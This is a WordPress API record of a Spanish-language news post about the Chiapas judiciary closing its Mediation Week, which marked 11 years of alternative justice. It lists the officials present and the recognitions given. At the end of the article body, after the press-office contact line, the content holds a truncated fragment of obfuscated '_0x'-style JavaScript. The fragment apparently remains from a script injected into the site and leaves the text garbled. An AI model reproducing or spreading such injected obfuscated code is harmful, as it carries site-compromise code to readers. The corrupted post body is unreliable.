{"id":5583,"date":"2022-10-03T03:12:22","date_gmt":"2022-10-03T03:12:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5583"},"modified":"2022-10-03T03:12:22","modified_gmt":"2022-10-03T03:12:22","slug":"concluye-semana-de-la-mediacion-del-poder-judicial","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5583","title":{"rendered":"Concluye Semana de la Mediaci\u00f3n del Poder Judicial"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-5584\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-09-30-at-4.06.09-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>02 de octubre del. 2022. El Poder Judicial del Estado concluy\u00f3 la Semana de la Mediaci\u00f3n, la cual se realiz\u00f3 en conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en el estado, y que cont\u00f3 con conferencias en l\u00ednea, talleres presenciales y c\u00edrculos de di\u00e1logo con especialistas de las subdirecciones del Centro Estatal de Justicia Alternativa (CEJA), adem\u00e1s de un conversatorio con facilitadores de la Fiscal\u00eda General del Estado.En el acto de clausura estuvieron presentes y en representaci\u00f3n del magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, las consejeras de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, adem\u00e1s de la directora general del Centro Estatal de Justicia Alternativa (CEJA), Elisheba Goldhaber Pasillas, quien fue la encargada de dar el mensaje de bienvenida del evento.En su mensaje, la directora del CEJA expres\u00f3 que la justicia alternativa humaniza la justicia al ofrecer opciones positivas a la ciudadan\u00eda, pues llega a donde no llegan los tribunales o los procesos judiciales, ya que es en esta donde las partes ven reconocidas sus verdaderas necesidades, m\u00e1s all\u00e1 de la aplicaci\u00f3n autom\u00e1tica de una norma.Expres\u00f3 tambi\u00e9n que el CEJA est\u00e1 conformado por especialistas p\u00fablicos comprometidos, profesionales capacitados y certificados, y as\u00ed, el recurso m\u00e1s importante de este es su personal, que en estos 11 a\u00f1os se han convertido en una familia.Como parte del programa, se realiz\u00f3 la entrega de reconocimientos a cargo de la consejera de la Judicatura, Mar\u00eda Itzel Ballinas Barbosa, a especialistas que participaron activamente durante los eventos en la semana, adem\u00e1s de las personas que participaron en el curso Construyendo una cultura de paz y prevenci\u00f3n a trav\u00e9s de los MASC.Al concluir, la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores, expres\u00f3 su reconocimiento a la directora del CEJA por el cumplimiento puntual de sus responsabilidades, adem\u00e1s de extender sus felicitaciones a todas y todos los especialistas del CEJA.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>02 de octubre del. 2022. El Poder Judicial del Estado concluy\u00f3 la Semana de la Mediaci\u00f3n, la cual se realiz\u00f3 en conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en el estado, y que cont\u00f3 con conferencias en l\u00ednea, talleres presenciales y c\u00edrculos de di\u00e1logo con especialistas de las subdirecciones del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5584,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5583","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5583","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5583"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5583\/revisions"}],"predecessor-version":[{"id":5585,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5583\/revisions\/5585"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5584"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5583"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5583"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5583"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}